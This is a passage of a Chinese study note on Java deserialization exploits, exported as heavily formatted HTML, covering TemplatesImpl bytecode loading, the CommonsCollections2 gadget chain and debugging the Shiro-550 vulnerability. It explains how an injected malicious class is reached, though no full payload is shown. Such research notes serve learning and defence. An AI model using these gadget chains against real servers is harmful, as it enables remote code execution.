bold;font-family: Consolas;">true</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  

                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> method</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">invoke</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> parameters</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">IllegalAccessException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> e</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//log.error("invokeMethod:", e);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  

                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://cloud.tencent.com/developer/article/1536342" target="_blank">https://cloud.tencent.com/developer/article/1536342</a></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">原始代码在这里，Spring用Slf4j记录日志，我这里调试没什么用，又省的拉依赖回来，我就直接全注释掉了，然后在源码中import</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">static</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;"> org</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">test</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">ser</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">ClassUtils</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">setFieldValue</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">调试时候建议在这里按照p牛说的链下断点</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">TemplatesImpl#</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getOutputProperties</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">-></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> TemplatesImpl#</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">newTransformer</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">-></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">TemplatesImpl#</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getTransletInstance</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">-></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> TemplatesImpl#</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">defineTransletClasses</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">-></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> TransletClassLoader#</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">defineClass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">在</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="">obj.newTransformer();</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">下断点后请直接</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;"></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">到这里，不然前面会有很折磨的idea debugger调试器的加载过程</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">p神关于bcel的文章中有一个链接,把fastjson和bcel都讲清楚了</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://kingx.me/Exploit-FastJson-Without-Reverse-Connect.html" target="_blank">https://kingx.me/Exploit-FastJson-Without-Reverse-Connect.html</a></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">还有对应公众号，非常值得一看</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;"></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc2;"><span style="font-family:Calibri;">CC2</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc2;"><span style="font-family:Cambria;font-weight:bold;">在commons-collections中找Gadget的过 程，实际上可以简化为，找⼀条从 Serializable#readObject() ⽅法到 Transformer#transform() ⽅法的调⽤链</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc2;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc2;"><span style="font-family:Cambria;">CommonsCollections2实际就是⼀条从 PriorityQueue 到 TransformingComparator 的利用链</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc2;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc2;"><span style="font-family:Cambria;">传进去的是队列，然后调用Transforming.comparator的compare方法调用传入的chaintransformer的transformer方法</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc2;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc2;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc2;"><span style="font-family:Cambria;">链子比较简单</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Calibri;">Shiro550</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style=""><a href="https://www.jianshu.com/p/f87b6301d668" target="_blank">https://www.jianshu.com/p/f87b6301d668</a></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="">idea默认使用unicode编码，tomcat用的是utf-8，需要改下idea的配置文件，调试时候日志才不会出现乱码</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="">[L</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">是一个JVM的标记，说明实际上这是一个数组</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">shiro在tomcat下不能反序列化有数组的payload的原因是调用了ClassUtils的forName，在调用时使用的是URLClassLoader，会去把[Lorg.apache.commons.collections.Transformer当成path去加载类，有了[L，肯定找不到</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">cc版本shiro和payload对应cc版本要一致，不然会导致</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="">static final long serialVersionUID = -4803604734341277543L;]:</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">报错</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">断点打在shiro-core中</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">可以看到调用hashmap的readobject</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">接着调用对key做hash到调用key的hashcode，到调用tidemap的hashcode</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">TidemapEntry的key是TemplatesImpl对象，他的_byte[]是我们传入的恶意类的byte，他的_class是已经从_byte还原的class</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span 